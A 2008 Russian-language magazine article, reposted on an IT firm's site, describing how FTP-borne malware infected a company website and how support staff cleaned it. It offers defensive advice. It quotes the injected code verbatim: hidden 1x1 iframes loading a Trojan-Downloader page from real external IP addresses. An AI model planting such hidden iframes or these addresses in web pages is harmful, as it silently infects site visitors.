АКСОН. Реализация компьютерной и офисной техники, расходных материалов. Монтаж локальных сетей. Ремонт и сервисное обслуживание техники. Системы учета на базе 1С. Создание сайтов, поддержка сайтов, продвижение сайтов.
 
Другие ресурсы

 

 Интернет Магазин

 Представительство в России

 

  Главная  Статьи  Идеальное преступление, или дело о заражении сайта крупной компании
         
 
Меню
 
 О Компании
Новости
Продукция
Услуги
Решения
Интернет-магазин
Статьи
Контакты
 
 
.  

   Идеальное преступление, или дело о заражении сайта крупной компании

 
Внутри статей 1 -->

Работая в службе техподдержки ИТ-компаний, приходится часто сталкиваться с интересными случаями заражения всякого рода вирусами.

Сегодня уже многие слышали о вирусах-звонилках, которые скрытно звонят в другие страны и разоряют пользователя счетами за международные переговоры, спамом (нежелательными письмами) уже тоже никого не удивишь. И все же среди огромного количества всевозможных разновидностей вредоносных программ нашелся-таки один интересный экземпляр, о котором я хотел бы рассказать читателям «Интернет и Я».

В нашу службу технической поддержки поступила заявка с жалобой на то, что антивирус, установленный на компьютере пользователя, постоянно обнаруживает вирусы, вылечивает, но затем снова ими заражается. Причем заявка поступила от сотрудника достаточно крупной компании, имя которой, по известным причинам, мы называть не будем.

Наш специалист выехал к клиенту, чтобы разобраться с ситуацией и помочь компьютеру избавиться от «неизлечимой болезни». На самом компьютере вирусов не оказалось, но отчеты антивируса сообщали, что этот же пользователь заходил на сайт своей же компании и именно здесь обнаруживался вирус. Мы начали искать того, кто имеет доступ к сайту. Оказалось, что один из менеджеров компании заходил ftp-клиентом на сайт и обновлял прайс. На его рабочем компьютере не было антивируса, а вирусов - множество. Один из них и залез через ftp-клиент и заразил файлы сайта этой компании. Оказалось, что клиенты компании уже давно жаловались, что при заходе на сайт их антивирус начинает предупреждать об опасности. Открывая главную страницу сайта, антивирус сообщал, что файл «http://81.95.149.74/22/index.php» заражен. Самое интересное, что адрес 81.95.149.74 не являлся адресом сайта компании.

Мы срочно связались с хостинг-компанией, на серверах которой был расположен этот корпоративный сайт. Её представитель сообщил, что аккаунты клиентов на вирусы не проверяются, поэтому на их системе в принципе не могут существовать активные вирусы. На веб-сервере хостинга была установлена операционная система Linux , а запуск вируса в ее среде очень маловероятен. Получив доступ к хостингу сайта, мы просмотрели последние измененные файлы сайта и обнаружили в них дописанный кем-то код:
<iframe src='http://81.95.149.74/22/index.php' width='1' height='1' style='visibility: hidden;'></iframe>
<iframe src='http://81.95.149.74/22/index.php' width='1' height='1' style='visibility: hidden;'></iframe>
<iframe src='http://81.95.149.77/traff.php' width='1' height='1' style='visibility:hidden'></iframe>

Все файлы сайта были загружены с хостинга, вылечены антивирусом и, на всякий случай, проверены вручную на отсутствие вирусного кода. Затем вернули все файлы обратно на хостинг, на котором был сменен пароль.
В результате выяснилось, что сайт компании, обратившейся к нам за помощью, был заражен довольно опасной разновидностью так называемого Trojan-Downloader (по данным вирусной энциклопедии Viruslist.ru). Этот тип вредоносных программ открывает злоумышленнику широкие возможности по управлению зараженным компьютером.

На компьютер, подвергшийся атаке, могут быть установлены другие вредоносные программы. Он может быть использован совместно с тысячами других компьютеров в массовой атаке на серверы.
С такого компьютера могут быть похищены пароли программ, данные банковских счетов, коды платежных карт и т.п.

Таким образом, вирус, заразив компьютер менеджера, имевшего доступ к сайту, дописал свой код в файлы. Дописанный код скрытно переадресовывал посетителей на другой сайт с вредоносным скриптом, заражавшим всех переадресованных. Такое вот запутанное и практически идеальное преступление. Идеальное, потому что большинство из нас доверяет сайтам известных компаний и не ждет от них угрозы заражения, а автор вируса как раз на это и рассчитывает. Так что сайт, заражающий посетителей - это не вымысел!

На прощанье руководству компании были даны рекомендации по повышению уровня безопасности сети предприятия. Весь персонал был проинструктирован, насколько серьезными могли быть последствия случившегося заражения, если бы вовремя не были предприняты меры. Клиенты были, конечно, успокоены извинениями и заверениями об устранении проблемы, но, согласитесь, такой случай - достаточно ощутимый удар по имиджу.

Выводы
После прочтения этого материала многие администраторы лишний раз задумаются: “А надежно ли защищен корпоративный веб-сайт?” И я думаю, что не будет лишним предпринять меры по усилению корпоративной безопасности. Во время написания статьи ради интереса был проведен небольшой поиск подобных случаев заражения сайтов в сети Интернет.
И их оказалось немало. Известная в области безопасности лаборатория Security Lab сообщала о том, что сайт известной компании Samsung не так давно был атакован вирусами и в течение нескольких дней ничего не подозревающие посетители могли заразить свои компьютеры. Не менее нашумевшим был случай массовой атаки на итальянские веб-сайты летом прошлого года, когда было заражено более 10.000 веб-страниц за короткий промежуток времени. Случай, описанный в статье, лишь подтверждает опасения экспертов безопасности и доказывает, что, во-первых, защищать нужно комплексно все компьютеры и серверы сети предприятия, во-вторых, необходимо поручать техническую поддержку сайта профессионалам и, в-третьих, что естественно, следить за актуальностью защиты.

Чтобы обезопасить не только компьютеры, но и сайт своей компании и его посетителей, соблюдайте эти простые рекомендации:
• периодически и чаще меняйте пароли на хостинге сайта;
• не пользуйтесь возможностью ftp-клиентов запоминания паролей;
• обновляйте своевременно Windows через систему Windows Update;
• следите за антивирусной программой и чаще обновляйте антивирусные сигнатуры;
• не пренебрегайте файерволом, как минимум не отключайте брандмауэр Windows;
• заходите через ftp только при наличии надежного антивируса;
• не подтверждайте установку неизвестных вам программ.

Статья опубликована в №2 (109) от 17.03.2008г. журнала «Интернет и Я».
Автор: Евгений Кожемяк
http://axon.kz

--- При копировании обязательно указывайте автора и ссылку на сайт ---

 

 

 
 
 
Справа в блоке -->

 
 
Новости IT 
 


Вирус, троян, iframe src, защита от вирусов, заражение сайта, антивирус

купить трансформатор

 

Все права защищены. 2004-2018 г.
© ТОО «НПО Аксон».

Создание сайтов в Костанае
Хостинг в Казахстане